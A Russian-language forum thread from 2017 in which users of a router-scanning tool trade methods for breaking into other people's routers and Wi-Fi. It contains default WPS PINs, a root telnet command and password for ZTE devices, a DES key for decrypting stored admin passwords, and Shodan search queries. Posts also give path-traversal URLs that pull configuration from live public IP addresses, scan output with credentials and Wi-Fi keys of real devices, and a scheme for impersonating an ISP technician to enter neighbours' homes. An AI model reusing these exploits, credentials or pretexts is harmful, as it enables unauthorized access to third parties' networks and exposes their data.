с провайдером все просто, у меня вся деревня от РТ выходит, чаще всего через тп-линки. На карте 3wi-fi видел несколько, но в реале сетей в разы больше, да и данные уже устарели.

LolipopR
06.10.2017, 21:04
юзайте уберфичу в RS, если скан в вашей деревне не айс

да, и направленную антенну от 12 dbi еще ни кто не отменял



Да вот жду адаптер.

LolipopR
06.10.2017, 21:43
тебя ждет чипсет 3070L с китая, угадал ))

ни чего нового от него не жди, нормальную направленную антенну к нему!

Какую ?

Изучай тему Антенны



Да. Я прекрасно знаю, что заказываю и не жду километры) тут другие причины выбора. С Антеннами попоже разберусь.

binarymaster
07.10.2017, 23:51
по маку понятно, что это Серкомы, произошло это примерно с начала этой недели.

Ранее в RS, Dumpper , Waircut выдавали Sercomm 6688V2, Sercomm rv6699, сейчас же все на всех прогах

WSC Name: BroadcomAP

Device Model: Broadcom

Serial Number: 1234



Не спорю, что это Sercomm, но они определённо на других чипсетах, следовательно модели другие.

У меня на районе баланс светлых и тёмных сил другой:

http://image.prntscr.com/image/iEU9ravfQzu_fwU2TRSC2g.png

binarymaster
08.10.2017, 00:10
У меня только одна мысль, может на китайских сайтах, кто выложил базу с серкомами,

иначе смысл всё это делать МГТС ?!



Здесь только инсайд поможет. Нужно добыть образцы этих ролтонов.

Видимо это какие-то особые, китайские Серкоммы.



Возможно, до вашего района еще не дошло



У нас эти RV6688BCM уже несколько лет, никто их не меняет, и пароли на них тоже.

(работает - не трогай)

PSYDRUGS
08.10.2017, 01:05
Кстати ZTE 660 станции можно мучать по wps., не одна еще в лок не ушла (только перезагружаются),



С прошивкой V2.30.20P7T12S, WPS залочен, где включен TR-069, прошивки накатывает удалённо пров, если старая FW то подойдёт дефолтный пин: 13419622.



так пару раз и пробил их, в морду правда зайти не дают, ни одна авторизация не пашет



В телнет введите команду: sendcmd 1 DB set UserInfo 0 Enable 1, для октетов: DC:02: 8E, E4:77:23 и CC:7B:35, авторизация по телнету, login: root password: Zte521.

На Huawei HG8245H принудительно включал WPS, 54:51:1B дефолт значение 72963982, уходит в лок после 3 попыток, по умолчанию WPS выключен.

TOX1C
08.10.2017, 01:24
Пока не забыл. На этих mgts gpon и zte 660 генерация пароля совпадала по внешнему виду с генерацией на каких то буржуйских роутерах. Может стоит покопать их старые прошивки, вдруг попадется искомый алгоритм.

Не первый раз уже такое. Наглядный пример - для zte zxhn h108n v4 использовался тот же алгоритм, что и какого то зарубежного варианта huawei (!) Hg520.

Была в сети пдф ка от positive technologies (не уверен что от них), с развалом прошивок различных роутеров, в основном для евро провайдеров. Не могу ее никак найти, хоть и стараюсь. Там много чего интересного было.

PSYDRUGS
08.10.2017, 01:46
другое дело , относительно новые Sercomm 6688V2, 6699, на которых МГТС решила поменять прошивку



В них рандомно генерируемые пароли (при условии что пользователь их не меняет), 8 символьные, состоящие из больших анг. букв и цифр. Спец. символов нет.

WPS включен на всех моделях и точно работает в частности на 6688v2 (не рубит пакеты после M2, признак заблокированности), но в лок уходят после 3-5 попыток.

Механизм генерирования WPS не подходит ни под один из известных алгоритмов, возможно зависит от уникального S/N или MAC.

Tudiblad
10.10.2017, 13:51
Подскажите пожалуйста, RS не определяет ник и пароль на эти TP-Link-и, но может кто знает, как генерируются пароли на них? Как пример таких TP-Link-ов и паролей:

62.205.0.0/16 F81:11:42:CA:3A DTKCA3B WPA/WPA2 Q2acMYcu

62.205.0.0/16 14:CC:20:A5:F1:70 DTKF171 WPA2 63isg3mm

62.205.0.0/16 B4:B3:62:FA:72:AA DTK72AA WPA/WPA2 LpksgVdk

Это все устройства одного провайдера.

TOX1C
10.10.2017, 14:33
Рандомно генерируются, или хешируется des ом от непонятно какой строки.

Это причуда провайдерская, у одесского тенета тоже провайдерский туполик идет со своим ssid и паролем, а не со стандартным заводским. Скорее всего сами их преднастраивают и раздают аборигенам.

Tudiblad
10.10.2017, 16:09
Рандомно генерируются, или хешируется des ом от непонятно какой строки.



По сему видно какой то алгоритм генерирования паролей есть, не понятно почему маленькие и большие буквы. и что такое "хешируется des ом от непонятно какой строки", по подробнее можно?

binarymaster
10.10.2017, 17:16
и что такое "хешируется des ом от непонятно какой строки", по подробнее можно?



https://en.wikipedia.org/wiki/Data_Encryption_Standard

Tudiblad
10.10.2017, 17:45
Спасибо, почитаю. Попробую разобраться.

binarymaster
10.10.2017, 18:10
Спасибо, почитаю. Попробую разобраться.



Ещё рекомендую ознакомиться:

https://forum.antichat.ru/posts/3889540/

Alan1999
11.10.2017, 02:55
доброго времени суток мож кто подскажет сканю этот диапазон 178.35.0.0/17 не парсятся Seems to be Micro DSL Router какие там пароли для входа в веб морду перепробовал все что знал не открывается ни один подскажите

buz00
11.10.2017, 08:06
Здравствуйте. Нельзя ли добавить возможность загружать для скана ип вида 10.0.0.1:80 10.0.0.2:8080 т.е. для каждого ип свой порт?

Alan1999
11.10.2017, 10:28
это ростелеком и пароли должны быть однотипные

Felis-Sapiens
11.10.2017, 21:26
Угнал конфиг пока хозяин настраивал доступ



Гугл говорит, что у ISG1000 есть уязвимость с неавторизованным доступом к конфигу:

https://6l.143.203.86/system/maintenance/export.php?type=sc

Проверьте, есть ли у этого.

juandiegomu
11.10.2017, 23:11
Scan Router http://193.153.195.185:8080/TLF_Login.html la búsqueda no puede conseguir me puede ayudar, gracias

Felis-Sapiens
11.10.2017, 23:21
Ни у кого нет декрипта?



Посмотрел прошивку - зашифрованы DES CBC (key = "Venusutm", "iv" = "licenses"):

Hg6MAD7MGTUEcoT9gHG+LhDc6E07QwG71SmiEodL/fQT/YirzsAURqDjk69469y - admin

CIW6wsU811r3kwZZDvQLRGibh4KTcS3VrPKgb2oRwUEmC0VpH3 0kLaLAfYiCgow - useradmin

ApL2aPQqcrZactBE+OkHqo8jkGR7VYIvRzaWYWVRiPj49ZmfMd ES679R03gf5ES - user

Для того выше по ссылке:

TaEr4bGdyq7hXYZ5Fe5nr3LF/xqsiKmEJd/gw8US5zM2sK3Bk7Svj59Esdfi1Nn - yinhe@qwys8551

AleksRull
12.10.2017, 00:05
Не парсит dasan http://10.56.3.183/dtree/globe.pngH660RW

Логин и пароль по дефолту user:user и больше ничего. сеть bks-tv.ru

juandiegomu
12.10.2017, 00:10
Имя пользователя? Pasword? Я не могу идти, спасибо

stasstv
13.10.2017, 09:15
RouterScan теперь и на codeby.net.

muradddddd
13.10.2017, 12:38
Годная тема но спалится можна

Tudiblad
13.10.2017, 14:35
А ни кто и не настаивает, каждый выбирает для себя свой путь. Будь спокоен товарищ, соответствующие службы тоже просматривают такие форумы и делают соответствующие выводы..................

Veil
13.10.2017, 15:08
Годная тема но спалится можна



С дуру можно и х... сломать, а с кулака и триппер подцепить.

TOX1C
13.10.2017, 22:02
На известные школоhuckerские форумы еще осталось понести. И тред на дваче создать потом. Вангую появление пару десятков тысяч точек с задрочистыми паролями в базе))

http://s019.radikal.ru/i614/1710/b6/8375f1e4f846.gif

Veil
13.10.2017, 22:05
На известные школоhuckerские форумы еще осталось понести. И тред на дваче создать потом. Вангую появление пару десятков тысяч точек с задрочистыми паролями в базе))

http://s019.radikal.ru/i614/1710/b6/8375f1e4f846.gif


Детская дурость не знает границ.

binarymaster
14.10.2017, 00:52
Scan Router http://193.153.195.185:8080/TLF_Login.html la búsqueda no puede conseguir me puede ayudar, gracias



https://www.shodan.io/search?query=TLF_Login.html&ref=os

Login? Password?



Не парсит dasan H660RW

http://10.56.3.183/dtree/globe.png

Логин и пароль по дефолту user:user и больше ничего. сеть bks-tv.ru



Нужны образцы, доступные извне, либо дорк на Shodan.

juandiegomu
14.10.2017, 14:03
micro_httpd не пароль, администратор, пароль 1234, и т.д., поздравление

binarymaster
14.10.2017, 22:27
micro_httpd не пароль, администратор, пароль 1234, и т.д., поздравление



Не нашёл в Shodan уязвимых, с данными admin:1234.



http://79.108.31.148:8080/login.html admin admin

Modem Name: CG6640E

Vendor Name: CBN Inc.

Firmware Version: CG6640-3.5.1.10a-SH

Boot Version: PSPU-Boot 1.0.12.19m1-CBN03

Hardware Version: 1.0

Serial Number: 605481405001153300000000

Firmware Build Time: 2014-05-16 19:19:52

WiFi Driver Version: v2.5.12.14



А вот тут нашёл уязвимость!

Можно получить настройки XML без авторизации:

http://79.108.31.148:8080/xml/../xml/CmgwWirelessSecurity.xml

http://79.108.31.148:8080/xml/../xml/CmgwWirelessWPS.xml

и т.д.

Естественно добавил.

antis17
14.10.2017, 23:03
Можно получить настройки XML без авторизации:

http://79.108.31.148:8080/xml/../xml/CmgwWirelessSecurity.xml

http://79.108.31.148:8080/xml/../xml/CmgwWirelessWPS.xml



У меня только с авторизацией ссылки работают, без неё Страница недоступна.

binarymaster
14.10.2017, 23:25
У меня только с авторизацией ссылки работают, без неё Страница недоступна.



Потому что браузер автоматом убирает /../, нужно использовать wget / curl / Charles.

http://image.prntscr.com/image/A8NqmbpeSDugvPysGPqtGg.png

ania01
15.10.2017, 09:32
Привет!

Роутер скан не видит роутер, определяет его как веб сервер http://5.3.116.80/

https://prnt.sc/gxl138

https://prnt.sc/gxl0z4

juandiegomu
15.10.2017, 12:28
micro_httpd, sin una contraseña predeterminada, sigo viendo, gracias binarymaster

binarymaster
15.10.2017, 15:13
Привет!

Роутер скан не видит роутер, определяет его как веб сервер http://5.3.116.80/

https://prnt.sc/gxl138

https://prnt.sc/gxl0z4



У вас версия RS старая - 2.53.

Vovan71
16.10.2017, 13:38
Ребят!

ткните носом на обсуждение )

все сми с утра кричат что наступил конец света сегодня в 15:00 опубликуют метод взлома WPA2

ну и ссылаются на www.krackattacks.com

зашел я значит на любимый античат а тут тишина )

erwerr2321
16.10.2017, 13:45
Это ж не новостное агенство в конце концов!

И вообще это тема RS...

Vovan71
16.10.2017, 13:56
так после опубликования сегодня механизма инструмента, любопытно мнение уважаемого Автора на предмет внедрения в RS

Ибо функционал RS на глазах расширяется )

binarymaster
16.10.2017, 13:56
Ребят!

ткните носом на обсуждение )

все сми с утра кричат что наступил конец света сегодня в 15:00 опубликуют метод взлома WPA2

ну и ссылаются на www.krackattacks.com

зашел я значит на любимый античат а тут тишина )



Если статья и появится, то скорее всего где-то тут:

https://forum.antichat.ru/categories/info.6/



так после опубликования сегодня механизма инструмента, любопытно мнение уважаемого Автора на предмет внедрения в RS

Ибо функционал RS на глазах расширяется )



Возможность реализации зависит напрямую от технических особенностей эксплуатации.

Почитал статью на сайте, вряд ли такое будет, ибо режим мониторинга нужен. По описанию чем-то напоминает атаку на TKIP (расшифровка / инжект данных), так что об ускорении вскрытия хендшейков здесь речи нет.

erwerr2321
16.10.2017, 16:07
Ребят!

ткните носом на обсуждение )

все сми с утра кричат что наступил конец света сегодня в 15:00 опубликуют метод взлома WPA2

ну и ссылаются на www.krackattacks.com

зашел я значит на любимый античат а тут тишина )



https://forum.antichat.ru/threads/o...-wpa2-key-reinstallation-attacks-krack.456840

Alexandr ITLab
16.10.2017, 16:43
Кому интересно:

https://papers.mathyvanhoef.com/ccs2017.pdf

НЕ впечатлило.

AlexUnder2010
16.10.2017, 23:42
Ткните, пожалуйста, в новую версию RS

upd. Нашел : http://rgho.st/8pfTwQRyb

binarymaster
17.10.2017, 20:20
В RS есть лишь алгоритм для Vodafone.

Для реализации этого алгоритма придётся серийник подцеплять в генератор.

http://www.wifi-libre.com/img/members/189/LiveBox-WPS-Pin-Calculator.png


Ну так и есть, алгоритм как у EasyBox, только серийник произвольный (а может и нет ).

http://image.prntscr.com/image/fhHZj4ePQEewDKuaWe4mDQ.png

AleksRull
17.10.2017, 21:13
https://www.shodan.io/search?query=TLF_Login.html&ref=os

Login? Password?

Нужны образцы, доступные извне, либо дорк на Shodan.



http://31.132.128.11 user:user

binarymaster
18.10.2017, 01:36
Ну так и есть, алгоритм как у EasyBox, только серийник произвольный (а может и нет ).

http://image.prntscr.com/image/fhHZj4ePQEewDKuaWe4mDQ.png


https://forum.antichat.ru/posts/4139654

Можно догадаться по скриншоту, в WPS PIN Companion была добавлена аналогичная фича.

Nem0
18.10.2017, 05:43
Интересная фиговина, появилась тут у меня рядом новая точка от Акадо, девайс ASUS RT-AC51U, firmware: 2.0, так вот через wps ее удачно вскрыл сразу, RS админку получил, я зашел как правильный пользователь подшаманил с настройками что бы соседям не мешать, не успел применить настройки как по таймауту меня выкинуло, а я уже RS закрыл и данные не сохранял, пробую зайти снова RS долбится и не заходит уже ни в какую... блин обидно сигнал хороший, а в админку не пущает, второй раз показывает пустое поле и пишет done, почему так?

exzet
18.10.2017, 09:23
ну и ссылаются на www.krackattacks.com



Без эксплоита так себе новость. И я так понимаю он не скоро еще появится.



режим мониторинга нужен



А режим, который дает драйвер Microsoft Network Monitor не подойдет?

binarymaster
18.10.2017, 10:09
а я уже RS закрыл и данные не сохранял



Проблема в этом.



второй раз показывает пустое поле и пишет done, почему так?



Какое именно пустое поле? Скриншоты есть?



А режим, который дает драйвер Microsoft Network Monitor не подойдет?



Npcap использует именно его. Но как уже обсуждалось, не все адаптеры поддерживают.

stasstv
18.10.2017, 10:29
Подскажите пожалуйста, после успешного подбора WPS нескольких точек, информация о них появляется в таблице, но при попытке подгрузить их на 3wifi пишет что нет точек для загрузки.

binarymaster
18.10.2017, 10:43
Подскажите пожалуйста, после успешного подбора WPS нескольких точек, информация о них появляется в таблице, но при попытке подгрузить их на 3wifi пишет что нет точек для загрузки.



В 3WiFi можно загружать точки только из вкладки Realtime Stats.

stasstv
18.10.2017, 10:55
В 3WiFi можно загружать точки только из вкладки Realtime Stats.



Понял, спасибо.

binarymaster
18.10.2017, 11:54
http://31.132.128.11 user:user



Я так и не понял, что там было. Вчера оно действительно не парсилось, а сегодня выдало:


31.132.128.11 80 16 Done admin:vertex25 Boa ADSL (xPON ONU | H660RW) 18:D0:71:76:F8:37 GONTWIFI_F830 WPA/WPA2 0000008F67 192.168.55.1 255.255.255.0 31.132.128.11 255.255.255.128 31.132.128.1 77.232.128.1 77.232.135.1

exzet
18.10.2017, 12:42
Npcap использует именно его.



Разве? Вон у каждого свои дрова стоят. Или у Network Monitor'а дрова опенсорсные?

http://image.prntscr.com/image/ef2tudr3SkSDbpfhuCYiMw.png

Надо будет на досуге глянуть сорцы Npcap

binarymaster
18.10.2017, 12:51
Надо будет на досуге глянуть сорцы Npcap



Они в документации (или где-то ещё, точно не помню) писали, что используют ту же технику, что и Microsoft Network Monitor.

Почитайте, и дайте знать, можно ли там инжектить пакеты.

exzet
18.10.2017, 13:07
Почитайте, и дайте знать, можно ли там инжектить пакеты.



Если правильно понял описание с гитхаба, то можно



Loopback Packet Injection: Npcap is also able to send loopback packets using the Winsock Kernel (WSK) technique. User-level software such as Nping can just send the packets out using Npcap Loopback Adapter just like any other adapter. Npcap then does the magic of removing the packet's Ethernet header and injecting the payload into the Windows TCP/IP stack.

binarymaster
18.10.2017, 13:09
Я так и не понял, что там было.



UPD: дошло. Файл конфигурации был недоступен. Починил одним доп. запросом.



Если правильно понял описание с гитхаба, то можно



Это про псевдо-интерфейс замыкания на себя. А вот с режимом 802.11 монитора всё сложнее.

exzet
18.10.2017, 14:03
Это про псевдо-интерфейс замыкания на себя. А вот с режимом 802.11 монитора всё сложнее.



Извиняюсь, не совсем понял про инжект пакетов. Если имелось ввиду отправка сырых пакетов обходя виндовый драйвер, то libpcap давно это позволяет. А если имелось ввиду инжектить пакеты в режиме монитора, то не знаю, возможно ли такое в принципе? Если только через режим менеджера попробовать, в общем надо доки курить.

binarymaster
18.10.2017, 16:37
А вот тут нашёл уязвимость!

Можно получить настройки XML без авторизации:

http://79.108.31.148:8080/xml/../xml/CmgwWirelessSecurity.xml

http://79.108.31.148:8080/xml/../xml/CmgwWirelessWPS.xml

и т.д.



Продолжая копаться в сетях Испании, решил откопать Arcadyan Livebox, для которого недавно был добавлен алгоритм генерации пина.

Для нахождения этих роутеров пришлось пройти небольшой квест, так как они маскируются под Apache - путём проб и ошибок правильный дорк был выявлен:

https://www.shodan.io/search?query=200+OK+Apache+no-cache+max-age=0,+must-revalidate+close+text/html+length+bytes+-Modified+-Expires

Дальше - интереснее. Эти железяки имеют ту же уязвимость, хотя производитель прошивки совсем другой!

http://85.54.48.2:8081/images/../status_main.stm

http://image.prntscr.com/image/1pht9LM_S9eifISRAF-o-Q.png

Осталось лишь вытащить данные авторизации из config_dsl.bin, но этим я пока решил не заниматься, ибо настройки и так хорошо добываются.

Информация по расшифровке имеется здесь:

https://wiki.openwrt.org/toh/arcadyan/arv7506

binarymaster
18.10.2017, 19:42
Продолжая копаться в сетях Испании, решил откопать Arcadyan Livebox



Хе хе, оказывается немецкие Vodafone EasyBox на этой же прошивке, я догадывался!

Да, они делят между собой одинаковые уязвимости веб интерфейса и пин кода.

Ossen
19.10.2017, 11:36
Людии ну будьте вы людьми ну ставьте вы свои роутеры на подоконник к примеру, ну не прячьте вы их под диванами или шкафами а то получается ни себе и ни людям

AleksRull
19.10.2017, 11:58
Не пойму 31.132.171.88 парсится admin:vertex25, но при входе в админку под user:user все равно пускает к настройкам. Что то не чисто с этими dasan H660RW

binarymaster
19.10.2017, 13:39
Не пойму 31.132.171.88 парсится admin:vertex25, но при входе в админку под user:user все равно пускает к настройкам. Что то не чисто с этими dasan H660RW



Я это уже поправил вчера.


31.132.171.88 80 31 Done admin:vertex25 Boa ADSL (xPON ONU | H660RW) 18:D0:71:77:34:47 59 WPA/WPA2 0000004377 192.168.55.1 255.255.255.0 31.132.171.88 255.255.255.224 31.132.171.65 77.232.128.1 77.232.135.1

sergnsk22
19.10.2017, 14:07
В веб-поиске возможно ли реализовать поиск по ип диапазону?

И возможно ли реализовать отображение на карте найденых элементов(через поиск)?

binarymaster
19.10.2017, 14:17
В веб-поиске возможно ли реализовать поиск по ип диапазону?

И возможно ли реализовать отображение на карте найденых элементов(через поиск)?



Это тема про Router Scan, а не про 3WiFi.

Nem0
21.10.2017, 03:44
Какое именно пустое поле? Скриншоты есть?



Поле где раньше показывало пароль, кстати и логин тоже тоже не показывает вобщем поля логин и пароль которые при первом заходе отобразились, теперь пустые поля

PSYDRUGS
21.10.2017, 03:51
Не парсит: http://46.39.232.188/, unknown, в браузере открываю - NATEKS NETWORKS VoIP Gateway, доступен и телнет;

BlackJackZ3108
21.10.2017, 14:46
интересно что:

Calix T073G-2 ONT Wi-Fi

Calix T073G ONT Wi-Fi

не поддаются пикси а самое интересное что по ним вообще ничего нет в сети кроме как тех документации и инструкции по настройке

вроде и морда его выглядит по деревянному но все же..

жаль что нет подопытного для проведения тестов..

upd:/1/Так же оборудование полная копия ericsson возможно и ПО используется одно и тоже

upd:/2/ В RS (W.N.) модель определяется как Realtek RTL8xxx EV-2010-09-20 (больше нет возможности сканирования)

upd:/3/ Предположительно найден один из таких зверьков \ и отправлен в личку Binarymasterу

upd:/4/ Cookie продолжают действовать даже после Logout \ а так же генерируются одинаковые с устройств в которых отсутствует wifi \ cookie генерируются из пароля по этому если пароль не дефолт то и cookie другое значение...

binarymaster
21.10.2017, 16:39
Поле где раньше показывало пароль, кстати и логин тоже тоже не показывает вобщем поля логин и пароль которые при первом заходе отобразились, теперь пустые поля



Надо было записывать в блокнот. Это могла быть та уязвимость, которая получает логин и пароль, когда админ залогинен в веб морде.

Нет админа в роутере - эксплойт не сработает.



Не парсит: http://46.39.232.188/, unknown, в браузере открываю - NATEKS NETWORKS VoIP Gateway, доступен и телнет;



У меня определяет:


46.39.232.188 80 31 Done VoIP Gateway





Calix T073G-2 ONT Wi-Fi

Calix T073G ONT Wi-Fi

не поддаются пикси а самое интересное что по ним вообще ничего нет в сети кроме как тех документации и инструкции по настройке



Скорее всего очередные ноу-нейм железяки на базе Realtek, с соответствующими прошивками.

binarymaster
21.10.2017, 23:09
http://92.62.68.216:8080/

Внезапно, клон модема Yota 4G.

tigos1
22.10.2017, 00:28
Эксперты по интернет-безопасности и официальные лица США в понедельник предупредили о недавно обнаруженной уязвимости сети Wi-Fi. Об этом сообщает DW.

Обнаруженная уязвимость позволяет хакерам распространять вредоносное ПО и красть конфиденциальную информацию.

Команда правительства США по компьютерному реагированию на чрезвычайные ситуации (CERT) опубликовала заявление о том, что недостаток безопасности Wi-Fi может позволить хакерам подслушивать или захватывать электронные устройства, подключенные к беспроводным сетям.

Новости по теме: Хакеры КНДР крадут миллионы долларов и не несут никакого наказания, - The New York Times

"Эксплуатация этих уязвимостей может позволить злоумышленнику взять под контроль уязвимую систему", - заявили в CERT, который является частью Департамента внутренней безопасности США.

Уязвимость обнаружилась в протоколе WPA2, используемом для защиты сетей Wi-Fi. Так как WPA2 используется для защиты всех современных сетей Wi-Fi, то атаке могут подвергнуться пользователи защищённых сетей Wi-Fi по всему миру.

Как подчёркивают эксперты, во избежание атак в дальнейшем следует обновить программное обеспечение, как только производители его выпустят. Отмечается, что следует проверить, доступны ли для обновления для физических устройств, и при необходимости обновить встроенное программное обеспечение роутера. Только после этого в качестве дополнительной меры можно будет сменить пароль Wi-Fi. Специалисты отмечают, что только смена пароля Wi-Fi не поможет избежать атаки.

Новости по теме: Politico: Хакеры могли взломать телефон главы аппарата Белого дома

В опасности находятся компьютеры, смартфоны, планшеты и другие устройства, использующие операционные системы Linux, Android, а также MacOS.

Ранее сообщалось о том, что серьезная уязвимость была обнаружена в обновлении популярного софта CCleaner. Вскоре она была устранена.

binarymaster
22.10.2017, 00:33
Уязвимость обнаружилась в протоколе WPA2, используемом для защиты сетей Wi-Fi.



Да знаем мы про это, уже во всех темах было.

muradddddd
22.10.2017, 02:12
эт через ubnt антену раздают инет типа nanostation у меня тож такая сеть есть ничего не берет пробывал хендшейк неловит хоть клиенты есть

Kakoluk
22.10.2017, 11:46
эт через ubnt антену раздают инет типа nanostation у меня тож такая сеть есть ничего не берет пробывал хендшейк неловит хоть клиенты есть



Ваше устройство, вероятно, плохо "слышит" клиентов станции(вечный перекос уровня сигнала "станция-клиент"), и поэтому не может корректно перехватить дамп рукопожатия(handshake).

Кстати, а причём тут тема RouterScan?

binarymaster
22.10.2017, 11:57
@exzet (https://forum.antichat.xyz/members/303941/) если на точке отключён WPS, то она естественно название модели роутера передавать не сможет.

А какой уровень сигнала?

tigos1
22.10.2017, 13:26
Да знаем мы про это, уже во всех темах было.


Если ЭТО так просто как они рассказывают, может пора добавить СУПЕР-СУПЕР фичу в программу..)

binarymaster
22.10.2017, 13:36
может пора добавить СУПЕР-СУПЕР фичу в программу..)



Может пора научиться читать непрочитанные посты в теме...

https://forum.antichat.ru/posts/4139017

tigos1
22.10.2017, 13:39
Может пора научиться читать непрочитанные посты в теме...

https://forum.antichat.ru/posts/4139017



Извините.

Просто у Вас вроде бы (мне так кажется), используется режим мониторинга "воздуха" для вылавливания ключей..

Поэтому подумал что может получиться.

И не вчитался в то что ОНО не ломает, а просто слушает "что там творится"

binarymaster
22.10.2017, 13:41
Просто у Вас вроде бы (мне так кажется), используется режим мониторинга "воздуха" для вылавливания ключей..



В том то и дело, что нет. На предыдущей странице даже дискуссия была.

Если бы был режим монитора, я бы и деаутентификацию замутил, и ловлю хендшейков.

Pebenok70
22.10.2017, 16:53
А с этим чудом китайской техники HG8245H-256M, что можно сделать? 86.57.178.112:80 root:admin BSSID в вот таком виде F8\x3a75\x3a88\x3a9B\x3aE0\x3a48

86.57.222.248:80 ZTE MT-PON-AT-3 на вебморду admin:******

exzet
22.10.2017, 19:07
ubnt антену



Да, вполне может быть, что там репитер.



если на точке отключён WPS, то она естественно название модели роутера передавать не сможет.

А какой уровень сигнала?



Это да, но ее и программы-то не все видят, и хендшейки мимо пролетают. Скоро есп32 должна придти, попробую ей хендшейк выловить

Уровень сигнала -60дб

Ossen
22.10.2017, 20:04
Как попасть в админку этого зверька ? http://95.221.80.163:80 Sercomm Wifire S1010 High-Speed Router

Felis-Sapiens
22.10.2017, 20:17
Как попасть в админку этого зверька ? http://95.221.80.163:80 Sercomm Wifire S1010 High-Speed Router



Пароль на наклейке на обратной стороне роутера:

http://00.img.avito.st/640x480/3200333900.jpg

tayerz
22.10.2017, 20:17
при попытке скачать "Ночная сборка Router Scan" по ссылке http://rgho.st/8pfTwQRyb (пароль antichat) сохраняется архив размером 43 байта, при попытке открыть пишет что архив поврежден или имеет неизвестный формат.

Так как же скачать Ночная сборка Router Scan???

TOX1C
22.10.2017, 20:32
31.23.75.192

admin password

eltex RG-1402GF-W

не парсит

Ossen
22.10.2017, 21:06
Пароль на наклейке на обратной стороне роутера:



интересно но нужен повод зайти к соседям и посмотреть наклейку

TOX1C
22.10.2017, 21:14
повод зайти к соседям и посмотреть наклейку



Школо-схема: наряжаешь дружка, он ломится к соседям под предлогом, типо здравствуйте, это нетбайнет, у вас в роутере вирус и мы сейчас по городу их перепрошиваем, и далее по ситуации.

binarymaster
22.10.2017, 21:21
сохраняется архив размером 43 байта



Пробовать другим браузером / под VPN / из под другого провайдера.

tayerz
22.10.2017, 21:58
Перебрал штук 7 браузеров и Tor Browser 6.0.8.... чет не получается

Есть ссылка на другом файлообменнике? Можно в личку

exzet
22.10.2017, 22:21
Ргхост тупит

binarymaster
22.10.2017, 22:57
А с этим чудом китайской техники HG8245H-256M, что можно сделать? 86.57.178.112:80 root:admin BSSID в вот таком виде F8\x3a75\x3a88\x3a9B\x3aE0\x3a48

86.57.222.248:80 ZTE MT-PON-AT-3 на вебморду admin:******



Пофиксил.

muradddddd
22.10.2017, 23:16
Почему через роутер скан в админку роутера незаходит постояно логин пароль выходит?

binarymaster
22.10.2017, 23:17
Почему через роутер скан в админку роутера незаходит постояно логин пароль выходит?



Нормально объясните.

muradddddd
22.10.2017, 23:21
Ну я вожу admin admin незаходит постояно окно вылазиет ведите логин пароль

binarymaster
22.10.2017, 23:23
Ну я вожу admin admin незаходит постояно окно вылазиет ведите логин пароль



Потому что логин/пароль неверный.

muradddddd
22.10.2017, 23:26
Как неверный если роутер скан нашел что логин и пароль admin admin

binarymaster
22.10.2017, 23:26
Как неверный если роутер скан нашел что логин и пароль admin admin



Подробнее... какая модель, название устройства? Данные помимо логина парсит?

muradddddd
22.10.2017, 23:29
на асусы роутеры незаходит в админку

muradddddd
22.10.2017, 23:31
10.12.20.59-10.12.40.255 вот ip

binarymaster
22.10.2017, 23:33
на асусы роутеры незаходит в админку



Помню, что раньше писал об этом, но пост не нашёл.

Отключайте в настройках автоматическую авторизацию в браузере. Браузер криво отсылает заголовки авторизации (не на все страницы), из-за этого может блокироваться авторизация на некоторых ASUS'ах.

muradddddd
22.10.2017, 23:40
Через internet xplore тож также постояно окно выходит

muradddddd
22.10.2017, 23:57
Я отключил настройки авторизаци это не исправило все равно окошка вылазиет

binarymaster
23.10.2017, 00:07
Я отключил настройки авторизаци это не исправило все равно окошка вылазиет



Придётся ждать, возможно до перезагрузки роутера.



31.23.75.192

admin password

eltex RG-1402GF-W

не парсит



Теперь парсит.

tayerz
23.10.2017, 23:45
Лучше этой программы я еще не встречал

erwerr2321
23.10.2017, 23:49
Лучше этой программы я еще не встречал


Более того, никто ещё не встречал лучше!

PS: Отдельное, спасибо СЕРЖу за создание данного топика на Античат!

Кста, никто не в курсе как он там?

Я переживаю каждый раз и очень скучаю...

ania01
24.10.2017, 17:15
Привет!

Дом ру стал устанавливать оборудование с таким мак D4:76:EA:20:0B:40

роутерскан его не определяет

muradddddd
24.10.2017, 17:27
Да незаходит в админку через роутер скан.

muradddddd
24.10.2017, 17:30
все браузеры перепробывал

muradddddd
24.10.2017, 20:46
Да незаходит в админку через роутер скан.

binarymaster
24.10.2017, 20:55
Привет!

Дом ру стал устанавливать оборудование с таким мак D4:76:EA:20:0B:40

роутерскан его не определяет



В базе 3WiFi есть роутеры ZTE с таким маком, как прокомментируете?

И да, нам нужны образцы.

Pebenok70
24.10.2017, 22:14
91.238.28.86:80 admin: MikroTik RouterOS v6.35.4 не отпарсился.

binarymaster
24.10.2017, 22:45
91.238.28.86:80 admin:<empty> MikroTik RouterOS v6.35.4 не отпарсился.



У меня отпарсился.

tayerz
24.10.2017, 23:21
Через WiFi обнаружил точку с параметрами во вкладке Wireless Networks --

TP-LINK TL-MR3020 1.0

BSSID 186:C7:A3:35:F2

ESSID Den 101286

IP Address 169.254.40.95

External IP 92.50.223.53

Как зайти к ней в веб морду

(пробовал и 169.254.40.95:80 92.50.223.53:80 169.254.40.95:8080 ну и т.п.)

binarymaster
24.10.2017, 23:55
IP Address 169.254.40.95



Так у вас локальный IP не присвоился, куда вы сканировать торопитесь?

Сначала надо выяснить настоящий IP шлюза. У TP-Link зачастую 192.168.0.1

PSYDRUGS
25.10.2017, 00:47
Почему через роутер скан в админку роутера незаходит постояно логин пароль выходит?



Блокировка после неверной авторизации, нужно подождать некоторое время, обычно таймаут ~ 300-600 сек.

Lesopoval
25.10.2017, 01:12
Казахстанский idnet, роутеры ONT GPON Home Gateway видит, но информации никакой. В базе на 3wifi они имеются, как так-то?

Ossen
25.10.2017, 01:26
но информации никакой. В базе на 3wifi они имеются, как так-то?



Логин пароль от аккаунта в 3wifi введи в RS

erwerr2321
25.10.2017, 01:29
Логин пароль от аккаунта в 3wifi введи в RS



я понял о чём он...



Казахстанский idnet, роутеры ONT GPON Home Gateway видит, но информации никакой. В базе на 3wifi они имеются, как так-то?



у Вас какая версия программы?

Используйте эту сборку!

Lesopoval
25.10.2017, 01:47
я понял о чём он...

у Вас какая версия программы?

Используйте эту сборку!



Вот спасибо, попёрло... а ведь ночной сборкой сканил...

ania01
25.10.2017, 04:10
В базе 3WiFi есть роутеры ZTE с таким маком, как прокомментируете?

И да, нам нужны образцы.



Что вам нужно в качестве образца?

muradddddd
25.10.2017, 09:41
Что вам нужно в качестве образца?

Ossen
25.10.2017, 10:37
